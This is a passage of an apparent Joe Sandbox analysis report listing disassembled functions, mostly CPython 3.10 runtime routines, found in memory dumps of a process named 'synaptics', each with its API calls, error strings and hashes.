                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LookupObject_$AttrCodec_Err_FormatFromTrueUnicode_
                                                                                                                                                                                                      • String ID: '%.400s' is not a text encoding; use %s to handle arbitrary codecs
                                                                                                                                                                                                      • API String ID: 3866841342-468792348
                                                                                                                                                                                                      • Opcode ID: 56292c41473bb3e5aa6b00dcbc5fe7df3807e0f15a7c6e82b77f9435d72fb463
                                                                                                                                                                                                      • Instruction ID: c52471f25478f621952f7953aa10e7a2b1d6253f831e87343afa7d514f779dbc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56292c41473bb3e5aa6b00dcbc5fe7df3807e0f15a7c6e82b77f9435d72fb463
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB21C4B2A002015BD600DEA9EC41D97B7E8EF00238B44477AED6CC3A91E731DD65C7C2
                                                                                                                                                                                                      Function 6C58EA10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(000000FF,000000FF,00000000,?,?,?,?,?,6C48BCC7,?,?), ref: 6C58EA40
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58EA7D
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58EA9C
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C58EAA3
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(unrecognized interpreter ID %lld,?,?,?,?,?,?,?,6C48BCC7,?,?), ref: 6C58EAC8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • unrecognized interpreter ID %lld, xrefs: 6C58EABD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterErr_FormatLeaveReleaseSemaphoreThread_acquire_lock_timed
                                                                                                                                                                                                      • String ID: unrecognized interpreter ID %lld
                                                                                                                                                                                                      • API String ID: 2708025052-3275825425
                                                                                                                                                                                                      • Opcode ID: 6d39147e84c57c70934889776a1d75d59946fce361eed446038dabc1e1f8a596
                                                                                                                                                                                                      • Instruction ID: a5decb42a41844e9a12e931d3d4fdf25dfd4b4458c7e2552fe25ba4989743730
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d39147e84c57c70934889776a1d75d59946fce361eed446038dabc1e1f8a596
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E21CF39702624ABDB208E59CC88B167775FB83F24F150728EC64A7A90E7B4F94087E5
                                                                                                                                                                                                      Function 6C575890 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(_bootstrap_external), ref: 6C5758B9
                                                                                                                                                                                                      • PyObject_GetAttr.PYTHON310(?,00000000), ref: 6C5758C9
                                                                                                                                                                                                      • PyObject_GetAttrString.PYTHON310(00000000,_RAW_MAGIC_NUMBER), ref: 6C5758EE
                                                                                                                                                                                                      • PyLong_AsLong.PYTHON310(00000000), ref: 6C57590E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttrObject_String$FromLongLong_Unicode_
                                                                                                                                                                                                      • String ID: _RAW_MAGIC_NUMBER$_bootstrap_external
                                                                                                                                                                                                      • API String ID: 1657937537-342346532
                                                                                                                                                                                                      • Opcode ID: 2115936f5f87ffe8285f221ac8d6d5f91be417d527b7259d477184560d8b27fa
                                                                                                                                                                                                      • Instruction ID: 7e900d66b1b6d629e53fc1e9e0f8aaaf5cdda286ae87605ba221f7ff73df0806
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2115936f5f87ffe8285f221ac8d6d5f91be417d527b7259d477184560d8b27fa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD11E776A0151257C210CA69EC40C9673E49F913747690379E83D97BE0EB28EDC3C7E1
                                                                                                                                                                                                      Function 6C44EE70 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyNumber_AsSsize_t.PYTHON310 ref: 6C44EECC
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C44EF44
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • sequence index must be integer, not '%.200s', xrefs: 6C44EEFD
                                                                                                                                                                                                      • '%.200s' object does not support item assignment, xrefs: 6C44EF12
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C44EF38
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Number_Ssize_tString
                                                                                                                                                                                                      • String ID: '%.200s' object does not support item assignment$null argument to internal routine$sequence index must be integer, not '%.200s'
                                                                                                                                                                                                      • API String ID: 1917868172-1802715091
                                                                                                                                                                                                      • Opcode ID: 62d09634e94c78cf333c0262392501de32d3ce79c6c65cb807fb1b7940b5a4f0
                                                                                                                                                                                                      • Instruction ID: 08bccf64537bb4c84e7f173faf53aec81fd31f466296f007bad1420215b5a46f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62d09634e94c78cf333c0262392501de32d3ce79c6c65cb807fb1b7940b5a4f0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F11C6377022046BFB00DE69E980F96F766EF8163AB309365E53886FD1CB32D85486D0
                                                                                                                                                                                                      Function 73A878DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,73A8799E,?,?,00000000,?,?,73A87A50,00000002,FlsGetValue,73A813D8,FlsGetValue), ref: 73A8796D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                      • API String ID: 3664257935-2084034818
                                                                                                                                                                                                      • Opcode ID: 4b14e4044107945a456d12b5f48843cbdbe168923de6dbf9b2500b716992fb1a
                                                                                                                                                                                                      • Instruction ID: 4e2678eeac3da3b552d6555e18f772ced027daa51eb21e27c8528d69a256fc4d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b14e4044107945a456d12b5f48843cbdbe168923de6dbf9b2500b716992fb1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB11EB329012319FCB535B6A8C43B8D37B5EF057A0F250256E919F72C8CB62E94286D5
                                                                                                                                                                                                      Function 6C477B80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 62COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,0000107A), ref: 6C477BA6
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%s() requires a dict argument, not '%s',?,?), ref: 6C477BD3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\dictobject.c, xrefs: 6C477B95
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C477B9A
                                                                                                                                                                                                      • %s() requires a dict argument, not '%s', xrefs: 6C477BC8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s() requires a dict argument, not '%s'$%s:%d: bad argument to internal function$D:\a\1\s\Objects\dictobject.c
                                                                                                                                                                                                      • API String ID: 376477240-346197705
                                                                                                                                                                                                      • Opcode ID: 2f2a4efbe4e55892a7076e1eeada62954be8331dd96f6c30e94627f6ec99f518
                                                                                                                                                                                                      • Instruction ID: 6ce5274c862b8c08f1fbb15e7295934570e1ecc1905d7a3323be55df86bb54f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f2a4efbe4e55892a7076e1eeada62954be8331dd96f6c30e94627f6ec99f518
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A311BF767042149FCB11DF99E801E86FBB5EB8876AB098566FA4CC7B21C731E851CBD0
                                                                                                                                                                                                      Function 6C44EAB0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,null argument to internal routine), ref: 6C44EAD1
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(%.200s is not a mapping,?), ref: 6C44EB1C
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(object of type '%.200s' has no len(),?), ref: 6C44EB38
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • object of type '%.200s' has no len(), xrefs: 6C44EB2D
                                                                                                                                                                                                      • null argument to internal routine, xrefs: 6C44EAC5
                                                                                                                                                                                                      • %.200s is not a mapping, xrefs: 6C44EB11
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ObjectString
                                                                                                                                                                                                      • String ID: %.200s is not a mapping$null argument to internal routine$object of type '%.200s' has no len()
                                                                                                                                                                                                      • API String ID: 709712237-3088654028
                                                                                                                                                                                                      • Opcode ID: 9273958c712108b7d9e085f6427a52061f3cb7b09b63907682653290c0a98266
                                                                                                                                                                                                      • Instruction ID: 9765714f38660203aa7937211b0cdde5c85373974cfa43263b284cc4c8c3e910
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9273958c712108b7d9e085f6427a52061f3cb7b09b63907682653290c0a98266
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC11A932E021159BEF11CE55EC44E95F765EF4173BB298264EC2C67FA1D761D85087C0
                                                                                                                                                                                                      Function 6C467D80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,argument list must be a tuple), ref: 6C467DA8
                                                                                                                                                                                                        • Part of subcall function 6C5657C0: _PyErr_SetObject.PYTHON310(?,?,00000000,00000000,6C73BD78,input too long,?,?,?,6C44EA96,?,null argument to internal routine), ref: 6C565807
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(?,keyword list must be a dictionary), ref: 6C467DD4
                                                                                                                                                                                                      • _PyObject_FastCallDictTstate.PYTHON310(?,?,?,?,?), ref: 6C467DEC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • keyword list must be a dictionary, xrefs: 6C467DC8
                                                                                                                                                                                                      • argument list must be a tuple, xrefs: 6C467D9C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$String$CallDictFastObjectObject_Tstate
                                                                                                                                                                                                      • String ID: argument list must be a tuple$keyword list must be a dictionary
                                                                                                                                                                                                      • API String ID: 55388167-3897508148
                                                                                                                                                                                                      • Opcode ID: 087b82e67d0abf1655d732a30db11ab7dfa77dbc578807717c69bf2990683c97
                                                                                                                                                                                                      • Instruction ID: 1e503d40affd2075c4cadb39a166e03a74a9f3cb37521b2b32d16e3463065a7c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 087b82e67d0abf1655d732a30db11ab7dfa77dbc578807717c69bf2990683c97
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF01B1B6709204AFDF04DA99EC41EE777699B80B5EB048858F80C46F02D722E560A6E0
                                                                                                                                                                                                      Function 6C5B0CE0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 45COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(|\plg,00000000,-000000FF,?,?,6C5AF341,?,00000101,00000000,00000000,?), ref: 6C5B0CED
                                                                                                                                                                                                      • _PyArena_New.PYTHON310(?), ref: 6C5B0CFB
                                                                                                                                                                                                        • Part of subcall function 6C586DA0: _PyErr_SetObject.PYTHON310(?,6C73C4C8,00000000), ref: 6C586DD7
                                                                                                                                                                                                      • PySys_Audit.PYTHON310(compile,6C6F4018,00000000,00000000,?), ref: 6C5B0D14
                                                                                                                                                                                                      • _PyArena_Free.PYTHON310(00000000,?,?,?,?,?), ref: 6C5B0D50
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Arena_$AuditErr_FreeFromObjectSys_Unicode_
                                                                                                                                                                                                      • String ID: compile$|\plg
                                                                                                                                                                                                      • API String ID: 1852789762-1243872881
                                                                                                                                                                                                      • Opcode ID: 7948664f52336d5f8d61fda92e70c1413e9d210b45b9678a247336564d5b3f00
                                                                                                                                                                                                      • Instruction ID: 84aea58a9fb553374d1420af4f6614a39f8c6118222e980b894cdaaab984845b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7948664f52336d5f8d61fda92e70c1413e9d210b45b9678a247336564d5b3f00
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F059776031153B6B1059A5AC40CEB7F19DFC01BCB000437FD1C9AB01EA31E90942E1
                                                                                                                                                                                                      Function 6C58C820 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C58C826
                                                                                                                                                                                                      • _isatty.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C58C82D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
